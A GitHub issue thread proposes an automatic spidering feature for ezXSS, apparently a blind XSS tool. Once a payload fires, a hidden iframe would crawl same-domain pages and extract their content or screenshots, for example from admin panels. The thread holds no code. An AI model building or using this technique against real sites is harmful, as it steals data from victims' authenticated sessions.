Feature request: Automatic spider #176
Comments
|
Hey Dick, Thanks for the feature request. This for sure sounds like something we can add. I would love for you to share the working code and possibly some ideas how to implement this in ezXSS. I can then look myself what would be the best way to implement this in the current system. |
|
@ssl great, I'll get back with some example code after my holidays! |
|
Hey @dicksnel! Hope you had a good holiday. Is this FR still something you would like to see in ezXSS? Let me know so I can implement it :) |
|
Hi @ssl, I still have it on my list but can't find the time yet. Feel free to close the issue and I'll open a new one later on or a PR when I have things ready! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi, thanks for this great tool!
It would be great if ezXSS can automatically spider an entire app after the XSS is triggered. This works adding a hidden iframe and scanning the target page for all hyperlinks with the same domain. Then for each found URL, fetch it via XHR in the iframe and extract all response data / screenshot it like a usual target page.
The advantage of this is that an attacker can gain immediate insight in all URL's and pages that are available in for example an admin panel.
If this is something to consider including, I have working code available from our own tooling.
The text was updated successfully, but these errors were encountered: